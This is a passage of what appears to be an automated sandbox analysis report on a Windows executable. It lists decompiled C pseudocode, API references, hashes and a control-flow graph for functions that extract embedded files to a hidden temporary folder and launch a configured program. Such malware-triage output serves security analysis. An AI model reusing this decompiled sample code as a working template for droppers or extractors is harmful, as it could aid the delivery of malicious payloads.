                                                                        				_t44 = _v528;
                                                                        				_t53 =  *0xa38a28; // 0x0
                                                                        				if(_t53 == 0) {
                                                                        					_t34 =  *0xa39a2c; // 0x0
                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                        						_t34 = _t44 & 0xff000000;
                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                        							 *0xa39a2c = _t44;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				E00A3411B(_t34, _t44);
                                                                        				CloseHandle(_v544.hThread);
                                                                        				CloseHandle(_v544);
                                                                        				if(( *0xa39a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                        					goto L12;
                                                                        				} else {
                                                                        					goto L11;
                                                                        				}
                                                                        			}


















                                                                        0x00a33fef
                                                                        0x00a33ffa
                                                                        0x00a34001
                                                                        0x00a34008
                                                                        0x00a3400a
                                                                        0x00a3400b
                                                                        0x00a34010
                                                                        0x00a3410a
                                                                        0x00a3411a
                                                                        0x00a3411a
                                                                        0x00a3401c
                                                                        0x00a3401d
                                                                        0x00a3401e
                                                                        0x00a3401f
                                                                        0x00a34033
                                                                        0x00a3403b
                                                                        0x00a340ca
                                                                        0x00a340e9
                                                                        0x00a340f8
                                                                        0x00a34101
                                                                        0x00a34106
                                                                        0x00a34106
                                                                        0x00a34108
                                                                        0x00a34108
                                                                        0x00000000
                                                                        0x00a34108
                                                                        0x00a34049
                                                                        0x00a3405c
                                                                        0x00a34062
                                                                        0x00a34068
                                                                        0x00a3406e
                                                                        0x00a34070
                                                                        0x00a34077
                                                                        0x00a3407f
                                                                        0x00a34089
                                                                        0x00a3408b
                                                                        0x00a3408b
                                                                        0x00a34089
                                                                        0x00a34077
                                                                        0x00a34091
                                                                        0x00a3409c
                                                                        0x00a340a8
                                                                        0x00a340b8
                                                                        0x00000000
                                                                        0x00a340c2
                                                                        0x00000000
                                                                        0x00a340c2

                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE ref: 00A34033
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A34049
                                                                        • GetExitCodeProcess.KERNELBASE ref: 00A3405C
                                                                        • CloseHandle.KERNEL32(?), ref: 00A3409C
                                                                        • CloseHandle.KERNEL32(?), ref: 00A340A8
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A340DC
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A340E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                        • String ID:
                                                                        • API String ID: 3183975587-0
                                                                        • Opcode ID: 773cfc288ea663a5ba700bc5e80a8b36a9b45e4e4481ef325cc7006420a1c942
                                                                        • Instruction ID: 23adf61d11c08c3d02366936661e338bef22f351ecda3ccc84a83ab0a82d5132
                                                                        • Opcode Fuzzy Hash: 773cfc288ea663a5ba700bc5e80a8b36a9b45e4e4481ef325cc7006420a1c942
                                                                        • Instruction Fuzzy Hash: 3731D731640218BBEB20DFA5DC4DFABB77CEBA9700F1042A9F545D21A1C6745D86CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E00A32BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				long _t4;
                                                                        				void* _t6;
                                                                        				intOrPtr _t7;
                                                                        				void* _t9;
                                                                        				struct HINSTANCE__* _t12;
                                                                        				intOrPtr* _t17;
                                                                        				signed char _t19;
                                                                        				intOrPtr* _t21;
                                                                        				void* _t22;
                                                                        				void* _t24;
                                                                        				intOrPtr _t32;
                                                                        
                                                                        				_t4 = GetVersion();
                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                        					if(_t12 != 0) {
                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                        						if(_t21 != 0) {
                                                                        							_t17 = _t21;
                                                                        							 *0xa3a288(0, 1, 0, 0);
                                                                        							 *_t21();
                                                                        							_t29 = _t24 - _t24;
                                                                        							if(_t24 != _t24) {
                                                                        								_t17 = 4;
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t20 = _a12;
                                                                        				_t18 = _a4;
                                                                        				 *0xa39124 = 0;
                                                                        				if(E00A32CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                        					_t9 = E00A32F1D(_t18, _t20); // executed
                                                                        					_t22 = _t9; // executed
                                                                        					E00A352B6(0, _t18, _t21, _t22); // executed
                                                                        					if(_t22 != 0) {
                                                                        						_t32 =  *0xa38a3a; // 0x0
                                                                        						if(_t32 == 0) {
                                                                        							_t19 =  *0xa39a2c; // 0x0
                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                        								E00A31F90(_t19, _t21, _t22);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t6 =  *0xa38588; // 0x0
                                                                        				if(_t6 != 0) {
                                                                        					CloseHandle(_t6);
                                                                        				}
                                                                        				_t7 =  *0xa39124; // 0x0
                                                                        				return _t7;
                                                                        			}


















                                                                        0x00a32c03
                                                                        0x00a32c0d
                                                                        0x00a32c18
                                                                        0x00a32c20
                                                                        0x00a32c2e
                                                                        0x00a32c32
                                                                        0x00a32c36
                                                                        0x00a32c3d
                                                                        0x00a32c43
                                                                        0x00a32c45
                                                                        0x00a32c47
                                                                        0x00a32c49
                                                                        0x00a32c4e
                                                                        0x00a32c4e
                                                                        0x00a32c47
                                                                        0x00a32c32
                                                                        0x00a32c20
                                                                        0x00a32c50
                                                                        0x00a32c54
                                                                        0x00a32c57
                                                                        0x00a32c64
                                                                        0x00a32c66
                                                                        0x00a32c6b
                                                                        0x00a32c6d
                                                                        0x00a32c74
                                                                        0x00a32c76
                                                                        0x00a32c7c
                                                                        0x00a32c7e
                                                                        0x00a32c87
                                                                        0x00a32c89
                                                                        0x00a32c89
                                                                        0x00a32c87
                                                                        0x00a32c7c
                                                                        0x00a32c74
                                                                        0x00a32c8e
                                                                        0x00a32c95
                                                                        0x00a32c98
                                                                        0x00a32c98
                                                                        0x00a32c9e
                                                                        0x00a32ca7

                                                                        APIs
                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00A36BB0,00A30000,00000000,00000002,0000000A), ref: 00A32C03
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A36BB0,00A30000,00000000,00000002,0000000A), ref: 00A32C18
                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A32C28
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00A36BB0,00A30000,00000000,00000002,0000000A), ref: 00A32C98
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                        • API String ID: 62482547-3460614246
                                                                        • Opcode ID: 7605bf8c6f1636f03b6d3dbfb9eefce0dadd8d0287bee2ee24a68bcfc1b2b145
                                                                        • Instruction ID: 35af43d065ab8ab4b147f6ff7084025614a9a4b7624724cecbd619210c69e64a
                                                                        • Opcode Fuzzy Hash: 7605bf8c6f1636f03b6d3dbfb9eefce0dadd8d0287bee2ee24a68bcfc1b2b145
                                                                        • Instruction Fuzzy Hash: 0311E1316003156BD720ABF6AD89B6F3769AB88391F141125F981E3290DB71DC0387A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A36F40() {
                                                                        
                                                                        				SetUnhandledExceptionFilter(E00A36EF0); // executed
                                                                        				return 0;
                                                                        			}



                                                                        0x00a36f45
                                                                        0x00a36f4d

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A36F45
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 1a8ca0753ec914fcd491db075744e5cbe87bab8f911a34967c77933cf34f5193
                                                                        • Instruction ID: dfafef1b37ed61b3c38199628720144b20e8e4c27a6d93666c0d13bedf9e16e8
                                                                        • Opcode Fuzzy Hash: 1a8ca0753ec914fcd491db075744e5cbe87bab8f911a34967c77933cf34f5193
                                                                        • Instruction Fuzzy Hash: A59002642511106796105BB09D1D41575916A5D603F929961B051C8494DB6140455512
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 232 a355a0-a355d9 call a3468f LocalAlloc 235 a355db-a355f1 call a344b9 call a36285 232->235 236 a355fd-a3560c call a3468f 232->236 251 a355f6-a355f8 235->251 241 a35632-a35643 lstrcmpA 236->241 242 a3560e-a35630 call a344b9 LocalFree 236->242 245 a35645 241->245 246 a3564b-a35659 LocalFree 241->246 242->251 245->246 249 a35696-a3569c 246->249 250 a3565b-a3565d 246->250 252 a356a2-a356a8 249->252 253 a3589f-a358b5 call a36517 249->253 254 a35669 250->254 255 a3565f-a35667 250->255 256 a358b7-a358c7 call a36ce0 251->256 252->253 258 a356ae-a356c1 GetTempPathA 252->258 253->256 259 a3566b-a3567a call a35467 254->259 255->254 255->259 262 a356f3-a35711 call a31781 258->262 263 a356c3-a356c9 call a35467 258->263 270 a35680-a35691 call a344b9 259->270 271 a3589b-a3589d 259->271 275 a35717-a35729 GetDriveTypeA 262->275 276 a3586c-a35890 GetWindowsDirectoryA call a3597d 262->276 269 a356ce-a356d0 263->269 269->271 273 a356d6-a356df call a32630 269->273 270->251 271->256 273->262 288 a356e1-a356ed call a35467 273->288 277 a35730-a35740 GetFileAttributesA 275->277 278 a3572b-a3572e 275->278 276->262 289 a35896 276->289 282 a35742-a35745 277->282 283 a3577e-a3578f call a3597d 277->283 278->277 278->282 286 a35747-a3574f 282->286 287 a3576b 282->287 298 a357b2-a357bf call a32630 283->298 299 a35791-a3579e call a32630 283->299 291 a35771-a35779 286->291 292 a35751-a35753 286->292 287->291 288->262 288->271 289->271 296 a35864-a35866 291->296 292->291 295 a35755-a35762 call a36952 292->295 295->287 309 a35764-a35769 295->309 296->275 296->276 307 a357d3-a357f8 call a3658a GetFileAttributesA 298->307 308 a357c1-a357cd GetWindowsDirectoryA 298->308 299->287 306 a357a0-a357b0 call a3597d 299->306 306->287 306->298 314 a3580a 307->314 315 a357fa-a35808 CreateDirectoryA 307->315 308->307 309->283 309->287 316 a3580d-a3580f 314->316 315->316 317 a35811-a35825 316->317 318 a35827-a3585c SetFileAttributesA call a31781 call a35467 316->318 317->296 318->271 323 a3585e 318->323 323->296
                                                                        C-Code - Quality: 92%
                                                                        			E00A355A0(void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v265;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				int _t32;
                                                                        				int _t33;
                                                                        				int _t35;
                                                                        				signed int _t36;
                                                                        				signed int _t38;
                                                                        				int _t40;
                                                                        				int _t44;
                                                                        				long _t48;
                                                                        				int _t49;
                                                                        				int _t50;
                                                                        				signed int _t53;
                                                                        				int _t54;
                                                                        				int _t59;
                                                                        				char _t60;
                                                                        				int _t65;
                                                                        				char _t66;
                                                                        				int _t67;
                                                                        				int _t68;
                                                                        				int _t69;
                                                                        				int _t70;
                                                                        				int _t71;
                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                        				int _t73;
                                                                        				CHAR* _t82;
                                                                        				CHAR* _t88;
                                                                        				void* _t103;
                                                                        				signed int _t110;
                                                                        
                                                                        				_t28 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t28 ^ _t110;
                                                                        				_t2 = E00A3468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                        				if(_t109 != 0) {
                                                                        					_t82 = "RUNPROGRAM";
                                                                        					_t32 = E00A3468F(_t82, _t109, 1);
                                                                        					__eflags = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                        						__eflags = _t33;
                                                                        						if(_t33 == 0) {
                                                                        							 *0xa39a30 = 1;
                                                                        						}
                                                                        						LocalFree(_t109);
                                                                        						_t35 =  *0xa38b3e; // 0x0
                                                                        						__eflags = _t35;
                                                                        						if(_t35 == 0) {
                                                                        							__eflags =  *0xa38a24; // 0x0
                                                                        							if(__eflags != 0) {
                                                                        								L46:
                                                                        								_t101 = 0x7d2;
                                                                        								_t36 = E00A36517(_t82, 0x7d2, 0, E00A33210, 0, 0);
                                                                        								asm("sbb eax, eax");
                                                                        								_t38 =  ~( ~_t36);
                                                                        							} else {
                                                                        								__eflags =  *0xa39a30; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									goto L46;
                                                                        								} else {
                                                                        									_t109 = 0xa391e4;
                                                                        									_t40 = GetTempPathA(0x104, 0xa391e4);
                                                                        									__eflags = _t40;
                                                                        									if(_t40 == 0) {
                                                                        										L19:
                                                                        										_push(_t82);
                                                                        										E00A31781( &_v268, 0x104, _t82, "A:\\");
                                                                        										__eflags = _v268 - 0x5a;
                                                                        										if(_v268 <= 0x5a) {
                                                                        											do {
                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                        												__eflags = _t109 - 6;
                                                                        												if(_t109 == 6) {
                                                                        													L22:
                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                        													__eflags = _t48 - 0xffffffff;
                                                                        													if(_t48 != 0xffffffff) {
                                                                        														goto L30;
                                                                        													} else {
                                                                        														goto L23;
                                                                        													}
                                                                        												} else {
                                                                        													__eflags = _t109 - 3;
                                                                        													if(_t109 != 3) {
                                                                        														L23:
                                                                        														__eflags = _t109 - 2;
                                                                        														if(_t109 != 2) {
                                                                        															L28:
                                                                        															_t66 = _v268;
                                                                        															goto L29;
                                                                        														} else {
                                                                        															_t66 = _v268;
                                                                        															__eflags = _t66 - 0x41;
                                                                        															if(_t66 == 0x41) {
                                                                        																L29:
                                                                        																_t60 = _t66 + 1;
                                                                        																_v268 = _t60;
                                                                        																goto L42;
                                                                        															} else {
                                                                        																__eflags = _t66 - 0x42;
                                                                        																if(_t66 == 0x42) {
                                                                        																	goto L29;
                                                                        																} else {
                                                                        																	_t68 = E00A36952( &_v268);
                                                                        																	__eflags = _t68;
                                                                        																	if(_t68 == 0) {
                                                                        																		goto L28;
                                                                        																	} else {
                                                                        																		__eflags = _t68 - 0x19000;
                                                                        																		if(_t68 >= 0x19000) {
                                                                        																			L30:
                                                                        																			_push(0);
                                                                        																			_t103 = 3;
                                                                        																			_t49 = E00A3597D( &_v268, _t103, 1);
                                                                        																			__eflags = _t49;
                                                                        																			if(_t49 != 0) {
                                                                        																				L33:
                                                                        																				_t50 = E00A32630(0,  &_v268, 1);
                                                                        																				__eflags = _t50;
                                                                        																				if(_t50 != 0) {
                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                        																				}
                                                                        																				_t88 =  &_v268;
                                                                        																				E00A3658A(_t88, 0x104, "msdownld.tmp");
                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                        																				if(_t53 != 0xffffffff) {
                                                                        																					_t54 = _t53 & 0x00000010;
                                                                        																					__eflags = _t54;
                                                                        																				} else {
                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                        																				}
                                                                        																				__eflags = _t54;
                                                                        																				if(_t54 != 0) {
                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                        																					_push(_t88);
                                                                        																					_t109 = 0xa391e4;
                                                                        																					E00A31781(0xa391e4, 0x104, _t88,  &_v268);
                                                                        																					_t101 = 1;
                                                                        																					_t59 = E00A35467(0xa391e4, 1, 0);
                                                                        																					__eflags = _t59;
                                                                        																					if(_t59 != 0) {
                                                                        																						goto L45;
                                                                        																					} else {
                                                                        																						_t60 = _v268;
                                                                        																						goto L42;
                                                                        																					}
                                                                        																				} else {
                                                                        																					_t60 = _v268 + 1;
                                                                        																					_v265 = 0;
                                                                        																					_v268 = _t60;
                                                                        																					goto L42;
                                                                        																				}
                                                                        																			} else {
                                                                        																				_t65 = E00A32630(0,  &_v268, 1);
                                                                        																				__eflags = _t65;
                                                                        																				if(_t65 != 0) {
                                                                        																					goto L28;
                                                                        																				} else {
                                                                        																					_t67 = E00A3597D( &_v268, 1, 1, 0);
                                                                        																					__eflags = _t67;
                                                                        																					if(_t67 == 0) {
                                                                        																						goto L28;
                                                                        																					} else {
                                                                        																						goto L33;
                                                                        																					}
                                                                        																				}
                                                                        																			}
                                                                        																		} else {
                                                                        																			goto L28;
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													} else {
                                                                        														goto L22;
                                                                        													}
                                                                        												}
                                                                        												goto L47;
                                                                        												L42:
                                                                        												__eflags = _t60 - 0x5a;
                                                                        											} while (_t60 <= 0x5a);
                                                                        										}
                                                                        										goto L43;
                                                                        									} else {
                                                                        										_t101 = 1;
                                                                        										_t69 = E00A35467(0xa391e4, 1, 3); // executed
                                                                        										__eflags = _t69;
                                                                        										if(_t69 != 0) {
                                                                        											goto L45;
                                                                        										} else {
                                                                        											_t82 = 0xa391e4;
                                                                        											_t70 = E00A32630(0, 0xa391e4, 1);
                                                                        											__eflags = _t70;
                                                                        											if(_t70 != 0) {
                                                                        												goto L19;
                                                                        											} else {
                                                                        												_t101 = 1;
                                                                        												_t82 = 0xa391e4;
                                                                        												_t71 = E00A35467(0xa391e4, 1, 1);
                                                                        												__eflags = _t71;
                                                                        												if(_t71 != 0) {
                                                                        													goto L45;
                                                                        												} else {
                                                                        													do {
                                                                        														goto L19;
                                                                        														L43:
                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                        														_push(4);
                                                                        														_t101 = 3;
                                                                        														_t82 =  &_v268;
                                                                        														_t44 = E00A3597D(_t82, _t101, 1);
                                                                        														__eflags = _t44;
                                                                        													} while (_t44 != 0);
                                                                        													goto L2;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							__eflags = _t35 - 0x5c;
                                                                        							if(_t35 != 0x5c) {
                                                                        								L10:
                                                                        								_t72 = 1;
                                                                        							} else {
                                                                        								__eflags =  *0xa38b3f - _t35; // 0x0
                                                                        								_t72 = 0;
                                                                        								if(__eflags != 0) {
                                                                        									goto L10;
                                                                        								}
                                                                        							}
                                                                        							_t101 = 0;
                                                                        							_t73 = E00A35467(0xa38b3e, 0, _t72);
                                                                        							__eflags = _t73;
                                                                        							if(_t73 != 0) {
                                                                        								L45:
                                                                        								_t38 = 1;
                                                                        							} else {
                                                                        								_t101 = 0x4be;
                                                                        								E00A344B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t101 = 0x4b1;
                                                                        						E00A344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						LocalFree(_t109);
                                                                        						 *0xa39124 = 0x80070714;
                                                                        						goto L2;
                                                                        					}
                                                                        				} else {
                                                                        					_t101 = 0x4b5;
                                                                        					E00A344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					 *0xa39124 = E00A36285();
                                                                        					L2:
                                                                        					_t38 = 0;
                                                                        				}
                                                                        				L47:
                                                                        				return E00A36CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                        			}





































                                                                        0x00a355ab
                                                                        0x00a355b2
                                                                        0x00a355c9
                                                                        0x00a355d5
                                                                        0x00a355d9
                                                                        0x00a35600
                                                                        0x00a35605
                                                                        0x00a3560a
                                                                        0x00a3560c
                                                                        0x00a35638
                                                                        0x00a35641
                                                                        0x00a35643
                                                                        0x00a35645
                                                                        0x00a35645
                                                                        0x00a3564c
                                                                        0x00a35652
                                                                        0x00a35657
                                                                        0x00a35659
                                                                        0x00a35696
                                                                        0x00a3569c
                                                                        0x00a3589f
                                                                        0x00a358a7
                                                                        0x00a358ac
                                                                        0x00a358b3
                                                                        0x00a358b5
                                                                        0x00a356a2
                                                                        0x00a356a2
                                                                        0x00a356a8
                                                                        0x00000000
                                                                        0x00a356ae
                                                                        0x00a356ae
                                                                        0x00a356b9
                                                                        0x00a356bf
                                                                        0x00a356c1
                                                                        0x00a356f3
                                                                        0x00a356f3
                                                                        0x00a35705
                                                                        0x00a3570a
                                                                        0x00a35711
                                                                        0x00a35717
                                                                        0x00a35724
                                                                        0x00a35726
                                                                        0x00a35729
                                                                        0x00a35730
                                                                        0x00a35737
                                                                        0x00a3573d
                                                                        0x00a35740
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3572b
                                                                        0x00a3572b
                                                                        0x00a3572e
                                                                        0x00a35742
                                                                        0x00a35742
                                                                        0x00a35745
                                                                        0x00a3576b
                                                                        0x00a3576b
                                                                        0x00000000
                                                                        0x00a35747
                                                                        0x00a35747
                                                                        0x00a3574d
                                                                        0x00a3574f
                                                                        0x00a35771
                                                                        0x00a35771
                                                                        0x00a35773
                                                                        0x00000000
                                                                        0x00a35751
                                                                        0x00a35751
                                                                        0x00a35753
                                                                        0x00000000
                                                                        0x00a35755
                                                                        0x00a3575b
                                                                        0x00a35760
                                                                        0x00a35762
                                                                        0x00000000
                                                                        0x00a35764
                                                                        0x00a35764
                                                                        0x00a35769
                                                                        0x00a3577e
                                                                        0x00a3577e
                                                                        0x00a35781
                                                                        0x00a35788
                                                                        0x00a3578d
                                                                        0x00a3578f
                                                                        0x00a357b2
                                                                        0x00a357b8
                                                                        0x00a357bd
                                                                        0x00a357bf
                                                                        0x00a357cd
                                                                        0x00a357cd
                                                                        0x00a357dd
                                                                        0x00a357e3
                                                                        0x00a357ef
                                                                        0x00a357f5
                                                                        0x00a357f8
                                                                        0x00a3580a
                                                                        0x00a3580a
                                                                        0x00a357fa
                                                                        0x00a35802
                                                                        0x00a35802
                                                                        0x00a3580d
                                                                        0x00a3580f
                                                                        0x00a35830
                                                                        0x00a35836
                                                                        0x00a3583d
                                                                        0x00a3584b
                                                                        0x00a35851
                                                                        0x00a35855
                                                                        0x00a3585a
                                                                        0x00a3585c
                                                                        0x00000000
                                                                        0x00a3585e
                                                                        0x00a3585e
                                                                        0x00000000
                                                                        0x00a3585e
                                                                        0x00a35811
                                                                        0x00a35817
                                                                        0x00a35819
                                                                        0x00a3581f
                                                                        0x00000000
                                                                        0x00a3581f
                                                                        0x00a35791
                                                                        0x00a35797
                                                                        0x00a3579c
                                                                        0x00a3579e
                                                                        0x00000000
                                                                        0x00a357a0
                                                                        0x00a357a9
                                                                        0x00a357ae
                                                                        0x00a357b0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a357b0
                                                                        0x00a3579e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35769
                                                                        0x00a35762
                                                                        0x00a35753
                                                                        0x00a3574f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3572e
                                                                        0x00000000
                                                                        0x00a35864
                                                                        0x00a35864
                                                                        0x00a35864
                                                                        0x00a35717
                                                                        0x00000000
                                                                        0x00a356c3
                                                                        0x00a356c5
                                                                        0x00a356c9
                                                                        0x00a356ce
                                                                        0x00a356d0
                                                                        0x00000000
                                                                        0x00a356d6
                                                                        0x00a356d6
                                                                        0x00a356d8
                                                                        0x00a356dd
                                                                        0x00a356df
                                                                        0x00000000
                                                                        0x00a356e1
                                                                        0x00a356e2
                                                                        0x00a356e4
                                                                        0x00a356e6
                                                                        0x00a356eb
                                                                        0x00a356ed
                                                                        0x00000000
                                                                        0x00a356f3
                                                                        0x00a356f3
                                                                        0x00000000
                                                                        0x00a3586c
                                                                        0x00a35878
                                                                        0x00a3587e
                                                                        0x00a35882
                                                                        0x00a35883
                                                                        0x00a35889
                                                                        0x00a3588e
                                                                        0x00a3588e
                                                                        0x00000000
                                                                        0x00a35896
                                                                        0x00a356ed
                                                                        0x00a356df
                                                                        0x00a356d0
                                                                        0x00a356c1
                                                                        0x00a356a8
                                                                        0x00a3565b
                                                                        0x00a3565b
                                                                        0x00a3565d
                                                                        0x00a35669
                                                                        0x00a35669
                                                                        0x00a3565f
                                                                        0x00a3565f
                                                                        0x00a35665
                                                                        0x00a35667
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35667
                                                                        0x00a3566c
                                                                        0x00a35673
                                                                        0x00a35678
                                                                        0x00a3567a
                                                                        0x00a3589b
                                                                        0x00a3589b
                                                                        0x00a35680
                                                                        0x00a35685
                                                                        0x00a3568c
                                                                        0x00000000
                                                                        0x00a3568c
                                                                        0x00a3567a
                                                                        0x00a3560e
                                                                        0x00a35613
                                                                        0x00a3561a
                                                                        0x00a35620
                                                                        0x00a35626
                                                                        0x00000000
                                                                        0x00a35626
                                                                        0x00a355db
                                                                        0x00a355e0
                                                                        0x00a355e7
                                                                        0x00a355f1
                                                                        0x00a355f6
                                                                        0x00a355f6
                                                                        0x00a355f6
                                                                        0x00a358b7
                                                                        0x00a358c7

                                                                        APIs
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                          • Part of subcall function 00A3468F: SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                          • Part of subcall function 00A3468F: LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                          • Part of subcall function 00A3468F: LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                          • Part of subcall function 00A3468F: memcpy_s.MSVCRT ref: 00A346E5
                                                                          • Part of subcall function 00A3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A355CF
                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A35638
                                                                        • LocalFree.KERNEL32(00000000), ref: 00A3564C
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A35620
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                          • Part of subcall function 00A36285: GetLastError.KERNEL32(00A35BBC), ref: 00A36285
                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 00A356B9
                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A3571E
                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A35737
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A357CD
                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A357EF
